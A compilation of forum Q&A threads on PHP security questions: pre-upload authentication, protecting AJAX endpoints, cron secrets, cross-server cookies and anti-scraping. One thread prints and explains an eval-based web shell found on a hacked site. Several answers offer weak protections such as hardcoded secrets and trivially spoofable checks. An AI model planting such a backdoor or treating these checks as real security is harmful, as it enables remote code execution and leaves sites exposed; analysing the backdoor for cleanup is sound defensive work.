I am trying to write a script for uploading large files (>500MB). I would like to do some authentication before the upload is processed, e.g.:
$id = $_GET['key'];
$size = $_GET['size'];
$time = $_GET['time'];
$signature = $_GET['signature'];
$secret = 'asdfgh123456';

if (sha1($id . $size . $time . $secret) != $signature) {
    echo 'invalid signature';
    exit;
}

// process upload...
Unfortunately, PHP only runs this code after the file has already been uploaded to a temporary directory, taking up valuable server resources. Is there a way to run it before the upload happens? I have tried similar things with Perl/CGI, but the same thing happens.
Wow, already five answers saying it can't be done. mod_perl to the rescue: there you can reject a request before the whole request body is uploaded, because mod_perl can hook an early request phase (e.g. a PerlHeaderParserHandler) that runs once the headers have arrived but before the body is read.
Apache is taking care of the upload before the PHP script is even invoked, so you won't be able to get at it.
You can either split up the process into two pages (authentication, file upload page) or, if you need to do it all in one page, use an AJAX-esque solution to upload the file after authentication parameters are checked.
As far as I know, you cannot do that in PHP. A PHP script is launched in response to a request, but the request has not been fully received until the file is uploaded, since the file being uploaded is part of the request.
This is definitely not possible inside the PHP script you're uploading to.
The most simple possibility is indeed to provide authentication one step before the upload takes place.
If that is not an option, one slightly outlandish possibility comes to mind - using a RewriteMap and mapping it to an external program (it should be possible to make that program a PHP script).
Using RewriteMap it is possible to rewrite a URL based on the output of a command-line program. If you use this directive to call a (separate) PHP script - you won't be able to use the user's session, though! - you have access to the GET parameters before the request body is processed.
If the check fails (= the credentials are invalid), you could rewrite the request to a static resource, which would at least prevent PHP from starting up. (I assume the upload will still hog some resources anyway, but probably fewer than if it were handed to PHP.)
No guarantees that this will work, though! I have no experience of my own with RewriteMap.
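An untested sketch of how that could look, pieced together from the Apache docs (file names and paths are invented, and RewriteMap only works in the server or vhost config, not in .htaccess). The map program reads one lookup key per line from STDIN and must answer with exactly one line on STDOUT:
RewriteEngine On
RewriteMap uploadauth prg:/var/www/tools/uploadauth.php
RewriteCond %{QUERY_STRING} ^(.+)$
RewriteCond ${uploadauth:%1} =DENY
RewriteRule ^/upload\.php$ /denied.html [L]
And the map program itself, a CLI PHP script with a shebang line so Apache can execute it directly:
#!/usr/bin/php
<?php
// uploadauth.php - RewriteMap "prg:" helper. Apache starts this once and feeds it
// one lookup key (here: the query string) per line; it must answer one line each.
$secret = 'asdfgh123456';
while (($line = fgets(STDIN)) !== false) {
    parse_str(trim($line), $q);
    $key  = isset($q['key'])  ? $q['key']  : '';
    $size = isset($q['size']) ? $q['size'] : '';
    $time = isset($q['time']) ? $q['time'] : '';
    $sig  = isset($q['signature']) ? $q['signature'] : '';
    echo (sha1($key . $size . $time . $secret) === $sig) ? "OK\n" : "DENY\n";
    fflush(STDOUT); // the prg: protocol requires unbuffered, line-by-line answers
}
Invalid requests get rewritten to the static /denied.html before PHP ever starts; the client may still transmit the body, but nothing expensive runs on the server.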
This is due to the fact that each HTTP request is a single entity that contains all of the form/POST data, including the file upload data.
As such, I don't believe it's possible to handle a file upload request in this fashion, irrespective of which scripting language you use.
I don't think you can do this. The best you can do is probably to run an AJAX function onSubmit to do your validation first, then, if it validates, execute the POST to upload the file. You could set a $_SESSION variable in your AJAX script if authentication succeeds, then check for that session variable in the upload script to allow the upload.
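A minimal sketch of that idea (file names are invented; note the file body still crosses the wire either way, you just avoid processing it):
<?php
// checkauth.php - called via AJAX before the form is submitted.
session_start();
$secret = 'asdfgh123456';
if (sha1($_GET['key'] . $_GET['size'] . $_GET['time'] . $secret) === $_GET['signature']) {
    $_SESSION['upload_authorised'] = true;
    echo 'ok';
}
<?php
// upload.php - refuses to process the file unless the AJAX check ran first.
session_start();
if (empty($_SESSION['upload_authorised'])) {
    echo 'invalid signature';
    exit;
}
// process upload...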
I have a massive set of scripts that my core application includes:
include('JS/gramp.php');
include('JS/est.php');
include('JS/curest.php');
include('JS/memomarker.php');
include('JS/local----------.php');
include('JS/poirel.php');
include('JS/maplayers.php');
include('JS/trafficinc.php');
include('JS/plannedtraffic.php');
include('JS/transportissues.php');
include('JS/cams_traff.php');
include('JS/places2.php');
Now these are all being moved to on-the-fly loading, to reduce the size of the application at load time:
if (button_case_curtime == true) {
    $(".jsstm").load("<?php echo $core_dir; ?>JS/curresttime.php?la=<?php echo $caseset['iplat']; ?>&lo=<?php echo $caseset['iplong']; ?>&h=<?php echo $days_h; ?>");
    rendermap = true;
}
The issue: the application requires these files to be secure; no one should be able to access the data involved.
The ONLY file that will ever request these files is index.php.
Any input or ideas would be fantastic!
There is no way to provide a file to the browser without also providing it to a user.
You could configure your server to only supply the files given an extra HTTP header (which you could add with JS), but nothing would stop people from sending that header manually or just digging the source out of the browser's debugging tools.
Any user you give the files to will have access to the files. If you want to limit which users have access to them, then you have to use auth/authz (which you'll want to apply to the index.php file as well so that unauthorised users don't just get JS errors or silent failure states).
No. What you are trying to do is not possible. Ajax requests are not special. They are just HTTP requests. End points created for Ajax should be secured with authentication/authorization just like any other HTTP request end point.
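As a sketch (assuming index.php sets some session variable at login; all names here are placeholders), every JS/*.php endpoint would start with the same guard:
<?php
// auth_guard.php - hypothetical include placed at the top of each JS/*.php file.
session_start();
if (empty($_SESSION['user_id'])) { // set by index.php when the user logs in (assumption)
    header('HTTP/1.0 403 Forbidden');
    exit;
}
Each endpoint then begins with require 'auth_guard.php'; and an unauthenticated caller gets a 403 instead of the data.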
This is a trivial solution that will solve your problem half-way. Request them via a POST request, like so:
$.post('JS/maplayers.php', {'ajax':true}, function(){});
Notice the POST variable 'ajax'. In the file maplayers.php, add to the beginning the following code:
if (!isset($_POST['ajax'])) {
    die('Invalid request, only ajax requests are permitted');
}
I have a file called q.php that has appeared on one of my websites. The site has been hacked. Does anyone know what the file does?
<? error_reporting(0); if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(@$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
It looks like it lets anyone execute PHP code passed in as the 'q' parameter of a GET request, or any code in the 'eval' parameter of a POST request. It suppresses all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.
It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advise you to clean up your server and start again from a clean installation.
It will enable the attacker to execute any code.
If you pass code to that script, either by ?q=code in the URL or by including it in the eval parameter of a POST request, it will get executed.
So basically this is a remote code execution backdoor.
Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server by passing it in the url or post data respectively.
The bigger question is how the attackers were able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers can execute code on your server without permission.
Merely deleting this file, and any other files with rogue code in them, does not fix the problem, which is that attackers are somehow able to upload files into your website's file repository.
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets the error reporting to off.
2/ if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with ?wpth set, the string ./mywebsite.co.uk/index.htm is echoed at the top of the page.
3/ <?=eval(@$_GET['q']);?>
This will execute any code included in the value of q, i.e. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kill the page execution if a post form variable called eval is not set.
5/ eval($_POST['eval']);
Executes any code posted from a remotely hosted form where the form variable is called eval.
I have a page that I want to execute via cron. It just does some pretty simple archiving stuff, nothing super high-security, no DB access etc.
Is it a secure practice to simply require a GET var to be present in order to execute the page? So myarchiver.php would be something like:
<?php
$mysecret_word = "abc123";
if ($_GET['secret'] == $mysecret_word) {
    // execute my stuff here
}
Then you'd just call myarchiver.php?secret=abc123 in the crontab and the process would run, while any wrong answer or attempt to execute the page with no secret would simply present a blank page (with no extra server load).
I realize this is not "secure" against man-in-the-middle attacks or a compromised site, but I believe in general it's plenty secure to keep this script from being fired by random script kiddies and other idiots who may somehow know about its existence. The thing I'm guarding against is random malicious users who may know about this script bombarding it with requests in order to DoS/tie up resources.
EDIT TO ADD: the server is not accessible via SSH and the cron is being executed on a remote machine, so it must be done via an HTTP request.
Thanks for input.
If this script is never going to be run from the browser, you should place the file outside of your web root directory where browsers cannot reach it and just have your cron run the script at the alternate location. It would definitely be the most secure way to do it.
If you're on a shared hosting environment, you may need browser access for manual running. I would just use SSH to manually run the file from its location since it only takes me a couple seconds to login to SSH and get to the directory. Personally, I just prefer not to have excess pages laying around on my website.
First off, why not just check the IP address of the server making the request?
If it has to be done via an HTTP request and simply checking the IP address isn't an option, you can have your cron run a script similar to "runcron.php". That script would in turn make a CURL or WGET request to the actual cron script you want to run.
That would allow you to pass a dynamic hash instead of a static key. That would prevent someone from just repeating the HTTP request if they happen to sniff the traffic. For the hash you could use anything dynamic like the date combined with a salt.
Example:
if (md5('secretword' . date('H')) == $_GET['hash']) { // do cron }
That would at least rotate your key once an hour.
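The calling side would then look something like this (URL and secret word are placeholders):
<?php
// runcron.php - executed by cron on the remote machine; never exposed via the web server.
$hash = md5('secretword' . date('H'));
file_get_contents('http://example.com/myarchiver.php?hash=' . $hash);
Both machines' clocks have to agree on the hour, otherwise you would also need to accept the previous hour's hash.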
Also, crontab won't let you pass GET variables. You'll have to do this -
/usr/bin/php /home/blah.php hello
Then in the script -
$argv = $_SERVER['argv'];
echo $argv[1];
Someone correct me if I'm mistaken.
This is a technique that Facebook uses on their logout.php file, so that if someone sends a link to logout.php it won't log them out. I would recommend doing this.
$mysecret_word = "abc123";
if ($_GET['asd2edxc32cwqcxad'] === $mysecret_word) {
    // execute my stuff here
} else {
    error_log('oopis');
    header('HTTP/1.0 404 Not Found');
    die();
}
I have a Flash upload script that uses a .php file as the processor. I need the processor file to set a cookie with a gallery ID that was created by the PHP script, and pass it on to the confirmation page. Except when Flash runs the PHP file... it doesn't set the cookie. It does set the session variable, which was good enough, but now I'm using lighttpd for the site (including the confirmation page) and Apache for the actual upload processor script (because lighttpd sucks at uploading large files), so the session vars don't get transferred between the two server programs.
How can I transfer a variable from the PHP processor (running on Apache) to a confirmation page running on lighttpd?
Well, I would assume that it doesn't set a cookie because it was called by a Flash script, not a browser, and cookies are stored by the browser.
The only ways I can think of are a mysql database, or simply a text file.
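A sketch of the text-file variant (paths, file names, and the $galleryId variable are all invented): the Apache-side processor stores the gallery ID under a random one-time token, the token travels to the confirmation page (for example in the URL that Flash sends the browser to), and the lighttpd side reads it back:
<?php
// processor.php (Apache side) - store the gallery ID under a random one-time token.
$token = md5(uniqid(mt_rand(), true));
file_put_contents('/var/www/shared/' . $token, $galleryId);
// hand $token back to Flash so it can send the browser to confirm.php?t=<token>
<?php
// confirm.php (lighttpd side) - read the value back and delete the token file.
$token = basename($_GET['t']); // basename() strips any ../ path tricks
$file = '/var/www/shared/' . $token;
if (is_file($file)) {
    $galleryId = file_get_contents($file);
    unlink($file);
}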
Just thought of a second solution which is probably less efficient than Nico's but may be better suited to you. If the cookie being sent to Flash isn't being sent to the browser also, you could use Flash's ExternalInterface class to pass the contents of the cookie to a javascript function which would set the cookie in the browser. Or you could call a javascript function which will make an AJAX call to fetch the contents of the cookie.
Not sure if we're doing the same thing, but I had a similar problem, not being able to set a cookie from a php script run through flash. However I later realized it failed because I was missing arguments.
flash.swf:
sendToURL('script.php?val=dataFromFlash');
script.php:
//setcookie('flashData', $_GET['val']); //this did not work
setcookie('flashData', $_GET['val'], '0', '/'); //this worked
The PHP manual says that only the name argument is required, but I had to specify the expire and path arguments to get this to work. Perhaps this is because, as Nico's answer indicates, it is not sent through a browser? Anyway, hope this helps.
Here is a solution for storing all uploaded image data in Flex with a PHP script:
$array = array();
$array["large_filename"] = $image_file_name;
$array["large_path"] = DIR_WS_IMAGES_TEMPIMAGES . $image_file_name;
$setcookie = serialize($array);
setcookie("ImageCookie", $setcookie, time() + (60 * 60 * 24 * 15));
One of my PHP pages returns data like this:
<?php
//...
echo "json string";
?>
But someone else uses file_get_contents() to fetch my data and use it on another website.
Can anybody tell me what I can do to prevent that from happening?
I considered getting the requesting domain name and echoing something else, but I don't know
the function to get the request's domain name, and if the request is sent by a server, that
would not help anyway. My English is poor, please bear with me.
You can also use sessions. If, somewhere in your application before the user gets the JSON data, you start a session, then in the page where you output the JSON data you can check for the session variable. This way only users that have passed through the session-generating page can view your output.
Suppose you have a page A.php that generates the session. Use this code before outputting anything on that page:
session_start();
$_SESSION['approvedForJson'] = true;
Then, in the page where you output the JSON data, call session_start() again before outputting anything; the beginning of your PHP code is a good place to call it.
Then, before outputting the JSON data, check whether the session variable for approved users exists:
if (isset($_SESSION['approvedForJson']) && $_SESSION['approvedForJson']) {
    echo "json data";
} else {
    // bad request
}
You can use $_SERVER['REMOTE_ADDR'] to get the client's IP address. You can also check $_SERVER['HTTP_REFERER'] and block external requests that way, but it's less reliable. There are probably a few other techniques involving $_SERVER that you can try.
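A rough sketch of the referer check (the domain is a placeholder; the Referer header is trivially forged and sometimes absent, so treat it as a deterrent only):
<?php
// Only answer requests that claim to come from a page on our own site.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (strpos($referer, 'http://www.example.com/') !== 0) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}
echo "json string";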
You're fighting an uphill battle here. I am assuming your server-side process that responds in JSON is being consumed via JavaScript in your users' browsers... so there is no easy way to encrypt it. You might try some of the techniques used to prevent XSRF (see http://en.wikipedia.org/wiki/Cross-site_request_forgery ). If you had the client pass along a session token that is unique per client, you could reduce some of the problem. But chances are whoever is stealing your data is going to figure out whatever mechanism you put in place... assuming this is some sort of AJAX thing. If it's a server-to-server thing then, as sli mentions, setting up some restrictions based on the remote IP would help, plus setting up some sort of API authentication tokens would help even more (see OAuth for some pointers).
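A sketch of the per-client token idea (file names invented): the page that makes the Ajax call embeds a session token, and the JSON endpoint requires the token back:
<?php
// page.php - generate a token for this session and hand it to the JavaScript.
session_start();
$_SESSION['json_token'] = md5(uniqid(mt_rand(), true));
echo '<script>var jsonToken = "' . $_SESSION['json_token'] . '";</script>';
<?php
// data.php - refuse requests that do not echo the token back.
session_start();
if (!isset($_GET['token']) || $_GET['token'] !== $_SESSION['json_token']) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}
echo "json string";
As the answer says, a determined scraper can still fetch the page first and replay the token, so this only raises the bar.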
You could also use .htaccess with Apache to block every external request to the page, so it can only be called internally, or block every request that is not from your domain:
Google search thingie
EDIT
You could also use a PHP file which includes the file that must not be read directly. So for example you have file.php:
<?php
$allowedFiles[] = 'somefile.php';
$allowedFiles[] = 'someotherFile.php';
$allowedFiles[] = 'jsonReturnFile.php';

if (in_array($_GET['file'], $allowedFiles)) {
    include("include/" . $_GET['file']);
}
?>
Then you can allow file_get_contents() on that file and write a RewriteRule in your .htaccess to disallow any direct request to the include/ folder:
RewriteRule ^include/ - [F,NC]
That will return a 403 Forbidden error for a request to that directory or any file in it.
Then you can do your JSON request to something like: file.php?file=jsonReturnFile.php&someOtherParamReadByJsonFile=1
And when someone tries to get the file contents of the JSON file directly, they will get the forbidden error, and getting the file contents of file.php won't return anything useful.